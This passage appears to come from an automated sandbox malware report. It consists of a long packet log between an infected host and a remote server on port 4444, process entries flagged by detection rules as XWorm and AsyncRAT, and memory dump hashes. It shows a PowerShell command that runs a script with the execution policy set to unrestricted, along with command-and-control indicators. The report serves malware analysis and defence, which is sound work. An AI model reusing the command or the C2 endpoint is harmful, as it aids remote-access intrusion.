                                            Jan 28, 2025 12:24:37.543430090 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.553936005 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:37.558748960 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.643538952 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.648693085 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:37.653445005 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.765522957 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.767213106 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:37.771992922 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.909468889 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.911386013 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:37.916191101 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:42.710256100 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:42.715080976 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:42.757144928 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:42.761951923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:42.925237894 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:42.927265882 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:42.932157993 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:43.047981977 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:43.050093889 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:43.054956913 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:52.820009947 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:52.824851036 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:52.929516077 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:52.934355974 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:52.944835901 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:52.949698925 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:52.960577965 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:52.965348959 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.035067081 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.040631056 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:53.045458078 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.157468081 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.159266949 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:53.164192915 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.562774897 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.584201097 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:53.589029074 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.738400936 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:53.819456100 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:53.897167921 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:53.902025938 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:03.085386992 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:03.090262890 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:03.194729090 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:03.199856043 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:03.414632082 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:03.416899920 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:03.421884060 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:03.422945023 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:03.424967051 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:03.471343994 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:05.899411917 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:06.025312901 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:10.273092031 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:10.278253078 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:10.488111973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:10.516865015 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:10.769498110 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:13.258018017 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:13.262892962 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:13.511614084 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:13.513921976 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:13.518934965 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:14.199474096 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:14.205740929 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:14.415617943 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:14.418720007 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:14.423506975 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:27.070179939 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:27.075076103 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:27.367079973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:27.369453907 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:27.374355078 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:34.163508892 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:34.169064999 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:34.379297018 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:34.383872032 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:34.389024973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:35.909409046 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:35.960099936 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:41.226120949 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:41.231045961 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:41.599607944 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:41.602344036 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:41.607933998 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:42.847016096 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:42.851919889 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:43.064966917 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:43.067711115 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:43.074814081 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:45.429156065 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:45.449965000 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:45.661132097 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:45.663000107 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:45.667846918 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:58.307554960 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:58.312817097 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:58.523391008 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:58.525437117 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:58.530288935 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:00.960674047 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:00.965668917 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.022994041 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:01.028028011 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.175746918 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.177247047 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:01.182045937 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.226178885 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:01.585155010 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.194529057 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.217210054 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.217544079 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.217622995 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.217813969 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.218118906 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.219368935 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.219398975 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.219428062 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.219549894 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.224422932 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.431071043 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.433315039 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.438229084 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:05.920555115 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:06.085192919 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:12.194772005 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:12.202930927 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:12.409871101 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:12.412309885 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:12.417186022 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:13.022916079 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:13.027909040 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:13.238106012 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:13.239839077 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:13.248230934 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:17.851758003 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:17.856709957 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:18.066459894 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:18.196356058 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:18.411580086 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:18.416481972 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:24.898181915 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:24.903155088 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:25.113127947 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:25.122064114 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:25.127404928 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.601160049 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.606209993 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.773207903 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.778214931 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.804230928 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.809185028 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.815841913 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.819607019 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.867415905 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.988142967 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.991591930 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.996439934 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.101591110 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.106719017 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.110625982 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.112229109 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.159267902 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.366899014 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.371942043 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.408775091 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.411006927 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.459286928 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.676942110 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.682055950 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.686899900 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.882294893 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.887126923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:29.097431898 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:29.099404097 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:29.104250908 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:31.273597002 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:31.278615952 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:31.488902092 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:31.490695953 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:31.495594025 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:33.819943905 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:33.824836969 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:34.035130024 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:34.039594889 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:34.044476032 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:35.928828001 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:36.031552076 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.195602894 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.201817036 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:38.413378954 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:38.414880991 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.421138048 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:38.913719893 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.918489933 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.107055902 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:39.112109900 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.128238916 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.135435104 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:39.187978983 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.335985899 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.339163065 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:39.344145060 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:40.101623058 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:40.106765985 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:40.317483902 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:40.319217920 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:40.324620962 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.304404974 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.311702967 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.335441113 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.342602015 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.366674900 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.373889923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.460725069 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.467880964 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.521752119 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.523711920 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.530035973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.642322063 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.648494005 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.653537035 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.765402079 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.767663002 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.775023937 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.884171009 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.887454987 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.892433882 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:50.054271936 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:50.059359074 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:50.340712070 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:50.343533993 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:50.348860979 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.085597038 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.090501070 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.301254988 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.303232908 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.308096886 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.335635900 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.340498924 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.684756041 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.686427116 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.691301107 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:01.210589886 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:01.217793941 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:01.425651073 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:01.427397013 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:01.435277939 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:05.948766947 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.007133961 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.554415941 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.562470913 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.632462025 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.637341976 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.769231081 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.770869970 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.776258945 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.891752005 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.894141912 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.899624109 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:14.210633039 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:14.215549946 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:14.425803900 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:14.427797079 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:14.432632923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:15.710886002 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:15.715794086 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:15.926110029 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:15.927184105 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:15.932112932 CET444449705176.113.115.225192.168.2.8
                                            050100150200s020406080100

                                            Click to jump to process

                                            050100150200s0.0050100150MB

                                            Click to jump to process

                                            • File
                                            • Registry
                                            • Network

                                            Click to dive into process behavior distribution

                                            Target ID:1
                                            Start time:06:23:06
                                            Start date:28/01/2025
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1"
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:high
                                            Has exited:true
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                            Target ID:2
                                            Start time:06:23:06
                                            Start date:28/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:06:23:09
                                            Start date:28/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xd00000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                            Executed Functions

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1476678104.00007FFB4B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b460000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a03e74d0550f3104f0af9a03bf424306ac6c1a1de7f3795126b702ec29e94c6
                                            • Instruction ID: 4286ef9a6de5f89ef737a3e8e541afa4c1e10ead9b11d27128e54c34bd27041c
                                            • Opcode Fuzzy Hash: 7a03e74d0550f3104f0af9a03bf424306ac6c1a1de7f3795126b702ec29e94c6
                                            • Instruction Fuzzy Hash: C6E237B1A0DB894FE79AAB3C98552B47FE1EF46320B0841FFD58DC71A3D9189C168391
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 5e247bc9ae63f56cbe337aeaf396ab2df403caf1e66fed64946159981e83bf09
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: AB01677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E882CB45
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e76f35a864409e6a9587771b42a91374c7ddae0df5f03d2b08a66a465494669
                                            • Instruction ID: f0f091fc64725d6f1d1a5f5d8374b2ced443c8085b4be060999f62b16dc3e540
                                            • Opcode Fuzzy Hash: 8e76f35a864409e6a9587771b42a91374c7ddae0df5f03d2b08a66a465494669
                                            • Instruction Fuzzy Hash: 17015A30A0864ACFDB59EF69D8906F973B2FF56315B50456DD12AC3291CA36A852CB40
                                            Memory Dump Source
